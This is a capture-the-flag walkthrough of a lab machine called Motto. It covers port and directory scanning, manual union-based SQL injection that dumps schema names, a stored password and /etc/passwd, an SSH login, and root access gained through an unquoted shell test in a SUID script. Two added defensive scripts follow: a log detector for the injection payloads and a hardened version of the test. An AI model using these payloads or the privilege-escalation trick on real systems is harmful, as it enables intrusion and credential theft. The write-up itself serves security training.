MazeSec-Motto-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

sudo arp-scan -l
Password:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.157 08:00:27:ae:79:5f PCS Systemtechnik GmbH
192.168.60.254 00:50:56:fc:db:36 VMware, Inc.
^C
export ip=192.168.60.157
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.60.157:22
Open 192.168.60.157:80
Open 192.168.60.157:9090
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 23:06 CST
Initiating ARP Ping Scan at 23:06
Scanning 192.168.60.157 [1 port]
Completed ARP Ping Scan at 23:06, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:06
Completed Parallel DNS resolution of 1 host. at 23:06, 0.85s elapsed
DNS resolution of 1 IPs took 0.85s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:06
Scanning 192.168.60.157 [3 ports]
Discovered open port 22/tcp on 192.168.60.157
Discovered open port 80/tcp on 192.168.60.157
Discovered open port 9090/tcp on 192.168.60.157
Completed SYN Stealth Scan at 23:06, 0.02s elapsed (3 total ports)
Nmap scan report for 192.168.60.157
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-08-24 23:06:48 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
9090/tcp open zeus-admin syn-ack ttl 64
MAC Address: 08:00:27:AE:79:5F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.03 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Directory Enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.157
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 1908]
Progress: 237031 / 1102800 (21.49%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 237072 / 1102800 (21.50%)
===============================================================
Finished
===============================================================

It is just a simple little game; there is nothing else there.


Enumerating port 9090

❯ gobuster dir -u "http://$ip:9090" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.157:9090
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login (Status: 200) [Size: 1304]
/register (Status: 200) [Size: 1326]
/static (Status: 301) [Size: 43] [--> /static/]
/myinfo (Status: 200) [Size: 68]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

There are login and registration functions, so try registering a user.


SQL Injection

The login form might be vulnerable to SQL injection; tried it, but it does not seem to work.

However, the nickname-change feature available after login accepts any name, including names of users that already exist.

Changing it to HYH lets you see HYH's messages under "My motto".


Try injecting: ' union select 1,2,group_concat(schema_name) from information_schema.schemata ; -- +


Continue with manual injection:

' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() ; -- +


Continue:

' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database(); -- +


Read the password column of the register_infos table directly:

' union select 1,2,password from register_infos ; -- +


This yields what appears to be a user password: cannotforgetyou

SQL injection can also be used to read files, write a shell and so on; there are plenty of options.

' union select 1,2,load_file('/etc/passwd'); -- +

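The union-based payloads above all carry the same three markers (UNION ... SELECT, information_schema, load_file()), which makes them easy to spot on the server side. The following is an added example, not part of this walkthrough or of the target application: a small log-side check written in POSIX shell. The access-log lines are constructed for the example, and the request path /myinfo with a nickname parameter is an assumption.

```shell
#!/bin/sh
# Added example (not from the walkthrough or the target app): a log-side
# check for the union-based payloads shown in the walkthrough.
# The four access-log lines below are constructed; the /myinfo path and the
# nickname parameter are assumptions made for this example.
SAMPLE_LOG='192.168.60.100 - - [24/Aug/2025:23:10:01 +0800] "GET /myinfo?nickname=HYH HTTP/1.1" 200 68
192.168.60.100 - - [24/Aug/2025:23:12:44 +0800] "GET /myinfo?nickname=%27+union+select+1,2,group_concat(schema_name)+from+information_schema.schemata+;+--+%2B HTTP/1.1" 200 412
192.168.60.100 - - [24/Aug/2025:23:15:09 +0800] "GET /myinfo?nickname=%27%20union%20select%201,2,load_file(%27/etc/passwd%27);%20--%20%2B HTTP/1.1" 200 2051
192.168.60.100 - - [24/Aug/2025:23:16:30 +0800] "POST /login HTTP/1.1" 302 0'

# Undo the encodings the payload usually travels in (+ and %20 for space,
# %27 for the quote, %28/%29 for parentheses), then match the three markers
# the walkthrough's payloads share: UNION ... SELECT, information_schema and
# load_file(). Case-insensitive, so mixed-case variants are caught as well.
flag_union_sqli() {
    sed -e 's/+/ /g' -e 's/%20/ /g' -e "s/%27/'/g" -e 's/%28/(/g' -e 's/%29/)/g' \
    | grep -iE 'union[[:space:]]+(all[[:space:]]+)?select|information_schema\.|load_file[[:space:]]*\('
}

# Number of flagged lines in the constructed sample (expected: 2 of 4).
count_flagged() {
    printf '%s\n' "$SAMPLE_LOG" | flag_union_sqli | wc -l | tr -d ' '
}

# Whether a single request line is flagged: prints yes or no.
is_flagged() {
    if printf '%s\n' "$1" | flag_union_sqli >/dev/null; then echo yes; else echo no; fi
}

printf '%s\n' "$SAMPLE_LOG" | flag_union_sqli
echo "flagged: $(count_flagged) of 4"
```

A signature check like this catches the payloads seen in this walkthrough, but only after the encodings it knows about are undone; double-encoded input or SQL comments inserted between keywords will slip past it, so treat it as a triage filter over access logs, not as a substitute for parameterised queries in the application.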

Getting a User Shell

Try an SSH connection as this redbean user with the password obtained earlier.

❯ ssh redbean@$ip
redbean@192.168.60.157's password:
Linux motto 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 31 04:01:36 2025 from 192.168.56.103
redbean@motto:~$ id
uid=1000(redbean) gid=1000(redbean) groups=1000(redbean)
redbean@motto:~$ cat user.txt
flag{796f756765747265646265616e}

Root Privilege Escalation

/opt/run_newsh was found to have the SUID bit set.

redbean@motto:~$ find / -perm -u=s 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/run_newsh

Try running it directly.

It looks like it ends up executing the /opt/new.sh file.

redbean@motto:/opt$ ./run_newsh abc

▓▒░ Loading system diagnostics ░▒▓

[INFO] Initializing environment checks:
● Module A status: OK (ver 1.15.140)
● Module B status: OK (ver 3.7.483)
● Module C status: OK (ver 4.16.368)
Random seed value: 1376
[INFO] Evaluating input parameters...
[INFO] Running diagnostic sequence:
→ Executing test 1 of 3
→ Executing test 2 of 3
→ Executing test 3 of 3

Waiting period: 6 seconds
>> Waiting T-6 seconds...
>> Countdown: 5
>> Waiting T-4 seconds...
>> Countdown: 3
>> Waiting T-2 seconds...
>> Countdown: 1
>> Waiting T-0 seconds...
Diagnostics complete.
Thank you for using the system monitor.
[STATS] Summary Report:
Processes checked: 33
/opt/new.sh: line 60: bc: command not found
CPU load average:
Uptime (hours): 70

The current user cannot read that file, but there is a backup copy in the user's home directory.

Bash Bypass

Skipping the rest of the description; in short, it comes down to bypassing the bash check.

redbean@motto:~$ cd .backup/
redbean@motto:~/.backup$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Jul 31 08:27 .
drwxr-xr-x 3 redbean redbean 4096 Jul 31 08:29 ..
-r--r--r-- 1 root root 1709 Jul 31 02:46 new.sh
-rw-r--r-- 1 root root 509 Jul 31 08:27 run_newsh.c
redbean@motto:~/.backup$ cat new.sh
#!/bin/bash
PATH=/usr/bin

…………………………

[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] && chmod +s /bin/bash

…………………………

Passing $1='flag ' (note the trailing space after flag) gets past the second check and reaches the chmod command: the second test quotes "$1", so 'flag ' is not equal to "flag", while the third leaves $1 unquoted, so word splitting drops the trailing space and the comparison succeeds.

# Without the space: goes straight to the exit 2 branch
redbean@motto:/opt$ ./run_newsh flag

▓▒░ Loading system diagnostics ░▒▓

[INFO] Initializing environment checks:
● Module A status: OK (ver 3.2.224)
● Module B status: OK (ver 5.7.163)
● Module C status: OK (ver 2.14.387)
Random seed value: 14915
[INFO] Evaluating input parameters...
redbean@motto:/opt$ echo $?
2
# With the space added
redbean@motto:/opt$ ./run_newsh 'flag '

▓▒░ Loading system diagnostics ░▒▓

[INFO] Initializing environment checks:
● Module A status: OK (ver 3.18.143)
● Module B status: OK (ver 4.0.21)
● Module C status: OK (ver 5.18.427)
Random seed value: 4794
[INFO] Evaluating input parameters...
[INFO] Running diagnostic sequence:
→ Executing test 1 of 3
→ Executing test 2 of 3
→ Executing test 3 of 3

Waiting period: 3 seconds
>> Countdown: 3
>> Waiting T-2 seconds...
>> Countdown: 1
>> Waiting T-0 seconds...
System stable.
Thank you for using the system monitor.
[STATS] Summary Report:
Processes checked: 61
/opt/new.sh: line 60: bc: command not found
CPU load average:
Uptime (hours): 15
redbean@motto:/opt$ echo $?
0
redbean@motto:/opt$ bash -p
bash-5.0# whoami
root
bash-5.0# cat /root/root.txt
flag{796f75676574726f6f74627574796f7563616e6e6f74676574686572}
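The quoting difference the walkthrough exploits (a quoted `[ "$1" = "flag" ]` followed by an unquoted `[ $1 = "flag" ]`) reproduced safely as an added example, not code from the box or from the walkthrough: the privileged chmod is replaced by an echo, and a hardened version with consistent quoting is shown beside it. The function names are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the walkthrough or the target box): reproduces the
# argument checks of the new.sh excerpt with echo in place of chmod, so the
# effect of quoting $1 in one test but not the other can be observed safely.

# Shows what word splitting does to an unquoted expansion: leading and
# trailing whitespace disappears and runs of spaces become argument breaks.
split_words() {
    # shellcheck disable=SC2086  # intentionally unquoted to show the effect
    set -- $1
    echo "$#:$*"
}

# Mirrors the vulnerable excerpt line for line (privileged action replaced).
vuln_check() {
    [ -n "$1" ] || { echo "no-arg"; return 1; }
    [ "$1" = "flag" ] && { echo "rejected"; return 2; }
    # Unquoted: 'flag ' is split to the single word flag, so this succeeds
    # even though the quoted comparison above did not. Inputs with several
    # words make [ fail with "too many arguments" and fall through instead.
    [ $1 = "flag" ] 2>/dev/null && { echo "setuid-branch"; return 0; }
    echo "normal"
}

# Hardened form: every expansion quoted, so both tests see the same string
# and the privileged branch becomes unreachable (ShellCheck reports the
# unquoted $1 of the original as SC2086). In a real script that branch
# should simply be removed.
fixed_check() {
    [ -n "$1" ] || { echo "no-arg"; return 1; }
    [ "$1" = "flag" ] && { echo "rejected"; return 2; }
    [ "$1" = "flag" ] && { echo "setuid-branch"; return 0; }
    echo "normal"
}

# Side-by-side run over the inputs that matter: exact match, trailing space,
# leading space, two words, unrelated word.
for arg in 'flag' 'flag ' ' flag' 'flag x' 'abc'; do
    printf "%-10s vuln=%-13s fixed=%s\n" "'$arg'" "$(vuln_check "$arg")" "$(fixed_check "$arg")"
done
```

The row for 'flag ' is the one the walkthrough relies on: the vulnerable version reports setuid-branch while the hardened one reports normal. Running ShellCheck over any SUID-invoked script, and quoting every `$var` it tests, closes this whole class of bypass.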